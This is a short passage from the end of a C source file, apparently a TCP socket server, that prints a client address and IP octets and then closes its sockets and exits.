:45295.\n", inet_ntoa(saddr_in2.sin_addr), ip1, ip2 , ip3, ip4); } close(sock_server_new); exit(0); } close(sock_server_new); } return 0; } /* EOF */